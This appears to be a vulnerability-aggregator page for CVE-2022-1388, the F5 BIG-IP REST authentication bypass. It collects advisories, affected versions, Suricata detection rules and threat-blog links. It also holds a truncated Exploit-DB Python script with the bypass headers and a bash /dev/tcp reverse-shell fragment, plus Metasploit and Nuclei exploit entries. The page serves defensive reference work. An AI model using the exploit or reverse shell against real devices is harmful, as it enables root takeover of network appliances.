CVE-2022-1388
published 2022-05-05CVE-2022-1388: On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all…
PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-31
Exploited in the wild
EPSS
99.96%
100.0th percentile
On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
Affected
84 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| f5 | big-ip | 11.6.x – 11.6.5 | — |
| f5 | big-ip | 12.1.x – 12.1.6 | — |
| f5 | big-ip | >= 13.1.x < 13.1.5 | 13.1.5 |
| f5 | big-ip | >= 14.1.x < 14.1.4.6 | 14.1.4.6 |
| f5 | big-ip | >= 15.1.x < 15.1.5.1 | 15.1.5.1 |
| f5 | big-ip | >= 16.1.x < 16.1.2.2 | 16.1.2.2 |
| f5 | big-ip_aam | — | — |
| f5 | big-ip_access_policy_manager | 11.6.1 – 11.6.5 | — |
| f5 | big-ip_access_policy_manager | 12.1.0 – 12.1.6 | — |
| f5 | big-ip_access_policy_manager | >= 13.1.0 < 13.1.5 | 13.1.5 |
| f5 | big-ip_access_policy_manager | >= 14.1.0 < 14.1.4.6 | 14.1.4.6 |
| f5 | big-ip_access_policy_manager | >= 15.1.0 < 15.1.5.1 | 15.1.5.1 |
| f5 | big-ip_access_policy_manager | >= 16.1.0 < 16.1.2.2 | 16.1.2.2 |
| f5 | big-ip_advanced_firewall_manager | 11.6.1 – 11.6.5 | — |
| f5 | big-ip_advanced_firewall_manager | 12.1.0 – 12.1.6 | — |
| f5 | big-ip_advanced_firewall_manager | >= 13.1.0 < 13.1.5 | 13.1.5 |
| f5 | big-ip_advanced_firewall_manager | >= 14.1.0 < 14.1.4.6 | 14.1.4.6 |
| f5 | big-ip_advanced_firewall_manager | >= 15.1.0 < 15.1.5.1 | 15.1.5.1 |
| f5 | big-ip_advanced_firewall_manager | >= 16.1.0 < 16.1.2.2 | 16.1.2.2 |
| f5 | big-ip_afm | — | — |
| f5 | big-ip_analytics | — | — |
| f5 | big-ip_analytics | 11.6.1 – 11.6.5 | — |
| f5 | big-ip_analytics | 12.1.0 – 12.1.6 | — |
| f5 | big-ip_analytics | >= 13.1.0 < 13.1.5 | 13.1.5 |
| f5 | big-ip_analytics | >= 14.1.0 < 14.1.4.6 | 14.1.4.6 |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
F5 BIG-IP Missing Authentication Vulnerability
cisa·2022-05-10·CVSS 9.8
CVE-2022-1388 [CRITICAL] CWE-306 F5 BIG-IP Missing Authentication Vulnerability
Vulnerability: F5 BIG-IP Missing Authentication Vulnerability
Affected: F5 BIG-IP
F5 BIG-IP contains a missing authentication in critical function vulnerability which can allow for remote code execution, creation or deletion of files, or disabling services.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-1388
Remediation Due Date: 2022-05-31
F5
CVE-2022-1388: On F5 BIG-IP 16
vendor_f5·2022-05-05·CVSS 9.8
CVE-2022-1388 [CRITICAL] CWE-306 CVE-2022-1388: On F5 BIG-IP 16
CVE-2022-1388: On F5 BIG-IP 16
On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
Affected Products: BIG-IP AAM, BIG-IP AFM, BIG-IP APM, BIG-IP ASM, BIG-IP Analytics, BIG-IP DNS, BIG-IP FPS, BIG-IP GTM, BIG-IP LTM, BIG-IP Link Controller, BIG-IP PEM, iControl REST
Affected Versions: 11.6.1 - 11.6.5; 12.1.0 - 12.1.6; 13.1.0 - 13.1.5; 14.1.0 - 14.1.4.6; 15.1.0 - 15.1.5.1; 16.1.0 - 16.1.2.2
F5 Advisory Articles: K23605346
F5 References: https://support.f5.com/csp/article/K23605346
GHSA
GHSA-mrph-rvc3-cv97: On F5 BIG-IP 16
ghsa_unreviewed·2022-05-06
CVE-2022-1388 [CRITICAL] CWE-306 GHSA-mrph-rvc3-cv97: On F5 BIG-IP 16
On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
VulnCheck
F5 BIG-IP Missing Authentication Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-1388 [CRITICAL] CWE-306 F5 BIG-IP Missing Authentication Vulnerability
F5 BIG-IP Missing Authentication Vulnerability
F5 BIG-IP contains a missing authentication in critical function vulnerability which can allow for remote code execution, creation or deletion of files, or disabling services.
Affected: F5 BIG-IP
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2022-1388; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.lacework.com/blog/malware-targeting-latest-f5-vulnerability/; https://cisa.gov/news-events/alerts/2022/05/18/threat-actors-exploiting-f5-big-ip-cve-2022-1388; https://blogs.jpcert.or.jp/en/2022/09/bigip-exploit.html; https://www.welivesecurity.com/wp-content/uploads/202
Suricata
ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Attempt (CVE-2022-1388) M3
suricata·2023-11-20·CVSS 9.8
CVE-2022-1388 [CRITICAL] ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Attempt (CVE-2022-1388) M3
ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Attempt (CVE-2022-1388) M3
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Attempt (CVE-2022-1388) M3"; flow:established,to_server; flowbits:set,ET.F5AuthBypass; http.method; content:!"GET"; http.uri; content:"/mgmt/tm"; startswith; http.request_header; header_lowercase; content:"authorization|3a 20|"; startswith; content:"YWRtaW46"; distance:0; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; content:"|0d 0a|x-f5-auth-token|0d 0a|"; fast_pattern; threshold:type limit, count 1, seconds 60, track by_src; reference:cve,2022-1388; classtype:attempted-admin; sid:2049256; rev:3; metadata:affected_product F5, created_at 2023_11_20, cve CVE_2022_1388, deployment Per
Suricata
ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Attempt (CVE-2022-1388) M2
suricata·2022-05-10·CVSS 9.8
CVE-2022-1388 [CRITICAL] ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Attempt (CVE-2022-1388) M2
ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Attempt (CVE-2022-1388) M2
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Attempt (CVE-2022-1388) M2"; flow:established,to_server; flowbits:set,ET.F5AuthBypass; http.method; content:!"GET"; http.uri; content:"/mgmt/tm"; startswith; http.request_header; header_lowercase; content:"authorization|3a 20|Basic|20|YWRtaW46"; startswith; http.connection; content:"x-F5-Auth-Token"; nocase; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; content:"|0d 0a|x-f5-auth-token|0d 0a|"; fast_pattern; threshold:type limit, count 1, seconds 60, track by_src; reference:cve,2022-1388; classtype:attempted-admin; sid:2036556; rev:4; metadata:created_at 2022_05_10, cve CVE_2022_1388
Suricata
ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass (CVE-2022-1388) M1
suricata·2022-05-09·CVSS 9.8
CVE-2022-1388 [CRITICAL] ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass (CVE-2022-1388) M1
ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass (CVE-2022-1388) M1
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass (CVE-2022-1388) M1"; flow:established,to_server; flowbits:set,ET.F5AuthBypass; http.method; content:"POST"; http.uri; bsize:18; content:"/mgmt/tm/util/bash"; fast_pattern; http.header; header_lowercase; content:"authorization|3a 20|Basic|20|YWRtaW46"; http.connection; content:"x-F5-Auth-Token"; nocase; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; content:"|0d 0a|x-f5-auth-token|0d 0a|"; http.request_body; content:"command"; content:"run"; distance:0; content:"utilCmdArgs"; distance:0; reference:cve,2022-1388; classtype:attempted-admin; sid:2036546; rev:6; metadata:created_at 2022_05_09, cv
Suricata
ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Server Response (CVE-2022-1388)
suricata·2022-05-09·CVSS 9.8
CVE-2022-1388 [CRITICAL] ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Server Response (CVE-2022-1388)
ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Server Response (CVE-2022-1388)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT F5 BIG-IP iControl REST Authentication Bypass Server Response (CVE-2022-1388)"; flow:established,to_client; flowbits:isset,ET.F5AuthBypass; http.stat_code; content:"200"; file.data; content:"kind"; content:"tm|3a|util|3a|bash|3a|runstate"; fast_pattern; distance:0; content:"command"; distance:0; content:"run"; distance:0; content:"utilCmdArgs"; distance:0; content:"commandResult"; distance:0; reference:cve,2022-1388; classtype:trojan-activity; sid:2036547; rev:3; metadata:created_at 2022_05_09, cve CVE_2022_1388, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag CISA_KEV, tag Descr
Exploit-DB
F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
exploitdb·2022-05-12·CVSS 9.8
CVE-2022-1388 [CRITICAL] F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
---
# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.f5.com/products/big-ip-services
# Version: 16.0.x
# CVE : CVE-2022-1388
from requests import Request, Session
import sys
import json
def title():
print('''
_______ ________ ___ ___ ___ ___ __ ____ ___ ___
/ ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \
| | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) |
| | \ \/ / | __|______/ /| | | |/ / / /______| ||__ _ _ & /dev/tcp/"+lhost+"/"+lport+" 0>&1'"
}
headers = {
'Authorization': 'Basic YWRtaW46',
'Connection':'keep-alive, X-F5-Auth-Token',
'X-F5-Auth-Token': '0'
}
s = Session()
req = Request('POST', url, json=data, headers=heade
Metasploit
F5 BIG-IP iControl RCE via REST Authentication Bypass
metasploit
F5 BIG-IP iControl RCE via REST Authentication Bypass
F5 BIG-IP iControl RCE via REST Authentication Bypass
This module exploits an authentication bypass vulnerability in the F5 BIG-IP iControl REST service to gain access to the admin account, which is capable of executing commands through the /mgmt/tm/util/bash endpoint. Successful exploitation results in remote code execution as the root user.
Nuclei
F5 BIG-IP iControl - REST Auth Bypass RCE
nuclei·CVSS 9.8
CVE-2022-1388 [CRITICAL] F5 BIG-IP iControl - REST Auth Bypass RCE
F5 BIG-IP iControl - REST Auth Bypass RCE
F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication.
Template:
id: CVE-2022-1388
info:
name: F5 BIG-IP iControl - REST Auth Bypass RCE
author: dwisiswant0,Ph33r
severity: critical
description: |
F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication.
impact: |
Successful exploitation of this vulnerability could allow an attacker to bypass authenticati
Nuclei
F5 BIG-IP Appliance Mode - Command Injection
nuclei·CVSS 9.8
CVE-2022-41800 [CRITICAL] F5 BIG-IP Appliance Mode - Command Injection
F5 BIG-IP Appliance Mode - Command Injection
When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint.
Template:
id: CVE-2022-41800
info:
name: F5 BIG-IP Appliance Mode - Command Injection
author: dwisiswant0
severity: high
description: |
When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint.
remediation: |
Apply security patches from F5 Networks as outlined in K97843387 and ensure Appliance mode restrictions are properly enforced.
impact: |
A successful exploit can allow the attacker to execute remote commands on server using authorization bypass (CVE-
Nuclei
F5 BIG-IP iControl REST Panel - Detect
nuclei·CVSS 9.8
CVE-2022-1388 [CRITICAL] F5 BIG-IP iControl REST Panel - Detect
F5 BIG-IP iControl REST Panel - Detect
F5 BIG-IP iControl REST API discovered and may be vulnerable to an authentication bypass (not tested).
Template:
id: bigip-icontrol-rest
info:
name: F5 BIG-IP iControl REST Panel - Detect
author: MrCl0wnLab
severity: info
description: |
F5 BIG-IP iControl REST API discovered and may be vulnerable to an authentication bypass (not tested).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-1388
- https://support.f5.com/csp/article/K23605346
- https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cwe-id: CWE-200
cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: f5
product: big-ip_a
Unit42
TuxBot v3: Inside an IoT Botnet Framework With LLM-Assisted Development
blogs_unit42·2026-07-15
CVE-2022-1388 TuxBot v3: Inside an IoT Botnet Framework With LLM-Assisted Development
## TuxBot v3: Inside an IoT Botnet Framework With LLM-Assisted Development
Chris Navarrete
Asher Davila
Doel Santos
Published: July 15, 2026
Malware
Threat Research
C2
DGA
Docker compose
Malware
TuxBot v3 Evolution
VirusTotal
XOR
## Executive Summary
We identified a previously undocumented modular internet-of-things (IoT) botnet framework named TuxBot v3 Evolution.
The malware authors leveraged an LLM to assist in their code development, yielding mixed results. While the AI complied with their request to generate botnet code, it included a safety disclaimer that the developer failed to remove before shipping.
Although the LLM clearly aided in constructing the botnet, several functions in the analyzed samples failed to work correctly. While a manual code review could hav
Tenable
Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
blogs_tenable·2026-05-27
CVE-2023-4966 Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
## Exposure Management
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
Tenable Research has developed a graph-based model linking 600+ threat groups to real-world customer exposures. It reveals which vulnerabilities sit at the intersection of severity, active exploit
Unit42
Threat Brief: Nation-State Actor Steals F5 Source Code and Undisclosed Vulnerabilities
blogs_unit42·2025-10-16·CVSS 8.5
CVE-2025-53868 [HIGH] Threat Brief: Nation-State Actor Steals F5 Source Code and Undisclosed Vulnerabilities
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: Nation-State Actor Steals F5 Source Code and Undisclosed Vulnerabilities
Justin Moore
Published: October 16, 2025
High Profile Threats
Vulnerabilities
CVE-2025-53868
CVE-2025-57780
CVE-2025-61955
Exfiltration
## Executive Summary
On Oct. 15, 2025, F5 — a U.S. technology company — disclosed that a nation-state threat actor conducted a significant long-term compromise of their corporate networks. In this incident, attackers stole source code from their BIG-IP suite of products and information about undisclosed vulnerabilities. F5’s BIG-IP suite is commonly used by large organizations, primarily in the U.S. but also globally, for availability, access control and security. Organizations including gove
Unit42
Threat Brief: Nation-State Actor Steals F5 Source Code and Undisclosed Vulnerabilities
blogs_unit42·2025-10-16·CVSS 8.5
[HIGH] Threat Brief: Nation-State Actor Steals F5 Source Code and Undisclosed Vulnerabilities
## Executive Summary
On Oct. 15, 2025, F5 — a U.S. technology company — disclosed that a nation-state threat actor conducted a significant long-term compromise of their corporate networks. In this incident, attackers stole source code from their BIG-IP suite of products and information about undisclosed vulnerabilities. F5’s BIG-IP suite is commonly used by large organizations, primarily in the U.S. but also globally, for availability, access control and security. Organizations including government agencies and Fortune 500 companies rely on BIG-IP.
Cortex Xpanse currently identifies over 600,000 unique hosts behind a Big-IP instance exposed to the internet.
F5’s investigation revealed that the attackers maintained long-term access to the company’s product development environment and eng
Tenable
Frequently Asked Questions About Iranian Cyber Operations
blogs_tenable·2025-06-27
Frequently Asked Questions About Iranian Cyber Operations
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Greynoiseio
GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
blogs_greynoiseio·2025-02-26·CVSS 9.8
[CRITICAL] GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Qualys
Defense Lessons From the Black Basta Ransomware Playbook
blogs_qualys·2025-02-25
Defense Lessons From the Black Basta Ransomware Playbook
## Table of Contents
Know Your Enemys Playbook
Attackers Move Fast
How Qualys Can Help
The cybersecurity world was rocked last week by a massive leak of Black Basta’s internal communications that emerged from the group’s chat logs. Triggered by internal conflicts and a retaliatory data dump following attacks on Russian banks, the exposed records offer a rare glimpse into Black Basta’s tactics, operations, and leadership.
We’ve analyzed these newly unveiled tactics, and in this blog, we equip security teams with clear, actionable insights. We aim to highlight the key lessons learned—like immediate patching, tighter access controls, and rapid incident response—and provide an urgent call to action. This practical guide aims to help organizations strengthen their defenses against evolving
Qualys
Defense Lessons From the Black Basta Ransomware Playbook | Qualys
blogs_qualys·2025-02-25
Defense Lessons From the Black Basta Ransomware Playbook | Qualys
#### Table of Contents
- Know Your Enemys Playbook
- Attackers Move Fast
- How Qualys Can Help
The cybersecurity world was rocked last week by a massive leak of Black Basta’s internal communications that emerged from the group’s chat logs. Triggered by internal conflicts and a retaliatory data dump following attacks on Russian banks, the exposed records offer a rare glimpse into Black Basta’s tactics, operations, and leadership.
We’ve analyzed these newly unveiled tactics, and in this blog, we equip security teams with clear, actionable insights. We aim to highlight the key lessons learned—like immediate patching, tighter access controls, and rapid incident response—and provide an urgent call to action. This practical guide aims to help organizations strengthen their defenses against ev
Bleepingcomputer
Iranian hackers work with ransomware gangs to extort breached orgs
blogs_bleepingcomputer·2024-08-28·CVSS 8.6
[HIGH] Iranian hackers work with ransomware gangs to extort breached orgs
## Iranian hackers work with ransomware gangs to extort breached orgs
## Sergiu Gatlan
An Iran-based hacking group known as Pioneer Kitten is breaching defense, education, finance, and healthcare organizations across the United States and working with affiliates of several ransomware operations to extort the victims.
The threat group (also tracked as Fox Kitten, UNC757, and Parisite) has been active since at least 2017 and is believed to have a suspected nexus to the Iranian government.
As CISA, the FBI, and the Defense Department's Cyber Crime Center warned today in a joint advisory, the attackers are monetizing their access to compromised organizations' networks by selling domain admin credentials and full domain control privileges on cyber marketplaces while using the 'Br0k3r' and,
Tenable
AA24-241A : Joint Cybersecurity Advisory on Iran-based Cyber Actors Targeting US Organizations
blogs_tenable·2024-08-28
AA24-241A : Joint Cybersecurity Advisory on Iran-based Cyber Actors Targeting US Organizations
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Greynoiseio
Cybersecurity in the Age of AI: What Experts are Saying
blogs_greynoiseio·2024-05-28
Cybersecurity in the Age of AI: What Experts are Saying
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Tenable
CVE-2024-21793, CVE-2024-26026: Proof of Concept Available for F5 BIG-IP Next Central Manager Vulnerabilities
blogs_tenable·2024-05-09·CVSS 7.5
[HIGH] CVE-2024-21793, CVE-2024-26026: Proof of Concept Available for F5 BIG-IP Next Central Manager Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Bleepingcomputer
New BIG-IP Next Central Manager bugs allow device takeover
blogs_bleepingcomputer·2024-05-08·CVSS 7.5
CVE-2024-26026 [HIGH] New BIG-IP Next Central Manager bugs allow device takeover
## New BIG-IP Next Central Manager bugs allow device takeover
## Sergiu Gatlan
F5 has fixed two high-severity BIG-IP Next Central Manager vulnerabilities, which can be exploited to gain admin control and create hidden rogue accounts on any managed assets.
Next Central Manager allows administrators to control on-premises or cloud BIG-IP Next instances and services via a unified management user interface.
The flaws are an SQL injection vulnerability ( CVE-2024-26026 ) and an OData injection vulnerability ( CVE-2024-21793 ) found in the BIG-IP Next Central Manager API that would allow unauthenticated attackers to execute malicious SQL statements on unpatched devices remotely.
SQL injection attacks involve injecting malicious SQL queries into input fields or parameters in database queries
Tenable
CVE-2023-46747: Critical Authentication Bypass Vulnerability in F5 BIG-IP
blogs_tenable·2023-10-27·CVSS 9.8
[CRITICAL] CVE-2023-46747: Critical Authentication Bypass Vulnerability in F5 BIG-IP
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities | Qualys
blogs_qualys·2023-08-24
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities | Qualys
#### Table of Contents
- References
- Additional Contributor
A unified front against malicious cyber actors is climactic in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, United Kingdom, Australia, and New Zealand, is a critical guide to strengthen global cyber resilience. The agencies involved include the U.S.’s CISA, NSA, and FBI; Canada’s CCCS; U.K.’s NCSC-UK; Australia’s ACSC; and New Zealand’s NCSC-NZ and CERT NZ.
This collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and highlight the need for shared intelligence and coordinated strategies. The realizatio
Qualys
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities
blogs_qualys·2023-08-24
Qualys Tackles 2022’s Top Routinely Exploited Cyber Vulnerabilities
## Table of Contents
References
Additional Contributor
A unified front against malicious cyber actors is climactic in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, United Kingdom, Australia, and New Zealand, is a critical guide to strengthen global cyber resilience. The agencies involved include the U.S.’s CISA, NSA, and FBI; Canada’s CCCS; U.K.’s NCSC-UK; Australia’s ACSC; and New Zealand’s NCSC-NZ and CERT NZ.
This collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and highlight the need for shared intelligence and coordinated strategies. The realization tha
Sentinelone
Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
blogs_sentinelone·2023-08-08·CVSS 9.1
[CRITICAL] Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
Leveraging known bugs and unpatched exploits continue to be an unyielding strategy for threat actors. Ranging from security bypasses and credential exposure to remote code execution, software vulnerabilities remain tools of the trade for cyber attackers looking for a way into lucrative systems.
While new flaws found in Active Directory and the MOVEit file transfer application along with those used in the AlienFox toolkit or recent IceFire ransomware campaigns have wreaked havoc this year, a number of existing vulnerabilities stand out from the rest in terms of how often they are abused to this day.
In this post, we delve into CISA’s latest round-up, which lists the top 12 most routinely exploited vulnerabilities of 2022 that continue to pose significant threats to enterprise businesses.
Sentinelone
Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
blogs_sentinelone·2023-08-08·CVSS 9.1
[CRITICAL] Enterprise Security Essentials | Top 12 Most Routinely Exploited Vulnerabilities
Leveraging known bugs and unpatched exploits continue to be an unyielding strategy for threat actors. Ranging from security bypasses and credential exposure to remote code execution, software vulnerabilities remain tools of the trade for cyber attackers looking for a way into lucrative systems.
While new flaws found in Active Directory and the MOVEit file transfer application along with those used in the AlienFox toolkit or recent IceFire ransomware campaigns have wreaked havoc this year, a number of existing vulnerabilities stand out from the rest in terms of how often they are abused to this day.
In this post, we delve into CISA’s latest round-up, which lists the top 12 most routinely exploited vulnerabilities of 2022 that continue to pose significant threats to enterprise businesses.
Tenable
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
blogs_tenable·2023-08-03
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Fortinet
Ransomware Roundup - Cl0p | FortiGuard Labs
blogs_fortinet·2023-07-21·CVSS 9.8
[CRITICAL] Ransomware Roundup - Cl0p | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Ransomware Roundup - Cl0p
By Shunichi Imano and James Slaughter | July 21, 2023
